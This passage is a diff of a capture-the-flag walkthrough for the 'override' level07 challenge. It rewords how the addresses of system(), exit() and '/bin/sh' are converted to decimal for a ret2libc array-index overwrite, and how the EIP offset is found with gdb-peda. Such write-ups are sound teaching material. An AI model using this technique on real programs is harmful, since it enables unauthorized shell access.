AdrianVarnier/override/level07/walkthrough.md

 0xf7f897ec
 ```

-The array store unsigned int value so if we want to store this address we need to convert them in decimal:
+Since the program only deals with decimal numbers, we must convert the addresses from hexa to decimal:
 ```
 system: 0xf7e6aed0 -> 4159090384
 exit: 0xf7e5eb70 -> 4159040368
 /bin/sh: 0xf7f897ec -> 4160264172
 ```

-To know wich index to use to 'overflow' our array we need to find the offset beetween `EIP` and the begining of our array:
+Now, we need to know at which index we should store the address of `system()`.
+Using `gdb-peda`, we found the offset between `EIP` and the beginning of our array by placing a breakpoint right after the call to `read()` and inspect the values:
 ```Shell
 Guessed arguments:
 arg[0]: 0xffffcdf4 --> 0x0